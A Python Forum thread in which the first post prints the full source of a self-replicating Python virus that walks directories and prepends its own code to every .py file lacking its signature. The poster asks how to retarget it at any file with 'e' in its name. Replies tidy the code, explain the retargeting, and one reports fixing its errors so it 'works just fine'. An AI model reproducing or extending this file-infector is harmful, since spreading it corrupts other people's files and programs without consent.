Python Forum
Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
Simple Python Virus
#1
First time poster, long time lurker.
I have a background of c++/c# programming and just a started practicing with Python. While looking for tutorials online I found this code written by Cranklin.

 
#!/usr/bin/python 
import os 
import datetime 
SIGNATURE = "CRANKLIN PYTHON VIRUS" 
def search(path): 
    filestoinfect = [] 
    filelist = os.listdir(path) 
    for fname in filelist: 
        if os.path.isdir(path+"/"+fname): 
            filestoinfect.extend(search(path+"/"+fname)) 
        elif fname[-3:] == ".py": 
            infected = False 
            for line in open(path+"/"+fname): 
                if SIGNATURE in line: 
                    infected = True 
                    break 
            if infected == False: 
                filestoinfect.append(path+"/"+fname) 
    return filestoinfect 
def infect(filestoinfect): 
    virus = open(os.path.abspath(__file__)) 
    virusstring = "" 
    for i,line in enumerate(virus): 
        if i>=0 and i <39: 
            virusstring += line 
    virus.close 
    for fname in filestoinfect: 
        f = open(fname) 
        temp = f.read() 
        f.close() 
        f = open(fname,"w") 
        f.write(virusstring + temp) 
        f.close() 
def bomb(): 
    if datetime.datetime.now().month == 1 and datetime.datetime.now().day == 25: 
        print "HAPPY BIRTHDAY CRANKLIN!" 
filestoinfect = search(os.path.abspath("")) 
infect(filestoinfect) 
bomb() 
From my understanding this little jewel is supposed to run every time a .py file is opened. Now, if I wanted to run on every file that contains an "e" in the name what should I do?

Also, what's the best environment to test viruses/malware/Trojan/ect? Would virtual box be a smart idea? 

Thanks.
Reply
#2
right!
Reply
#3
Pretty weak code.

            infected = False 
            for line in open(path+"/"+fname): 
                if SIGNATURE in line: 
                    infected = True 
                    break 
            if infected == False: 
                filestoinfect.append(path+"/"+fname) 
better:
            for line in open(path+"/"+fname): 
                if SIGNATURE in line: 
                    break 
            else: 
                filestoinfect.append(path+"/"+fname) 
Craig "Ichabod" O'Brien - xenomind.com
I wish you happiness.
Recommended Tutorials: BBCode, functions, classes, text adventures
Reply
#4
Where you check if the filename ends in .py, instead check "e" in fname.

But... if it isn't a python file, then it won't do anything except make it so you will have a difficult time opening your files.
Reply
#5
I spent about 10 minutes fixing the errors in this virus and now it works just fine. One of the stranger errors that you should be able to clearly see is in (or should I say outside) the function bomb(). Second half of the definition isn't actually in included in bomb().

Overall, many ways to improve this virus and keep it relatively simple.
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  My .exe made using Python being detected as a virus 100grassfed 2 2,950 Jun-16-2021, 04:41 AM
Last Post: buran
  Executable looks like virus to windows samuelbachorik 4 2,977 Apr-27-2020, 02:46 PM
Last Post: samuelbachorik

Forum Jump:

User Panel Messages

Announcements
Announcement #1 8/1/2020
Announcement #2 8/2/2020
Announcement #3 8/6/2020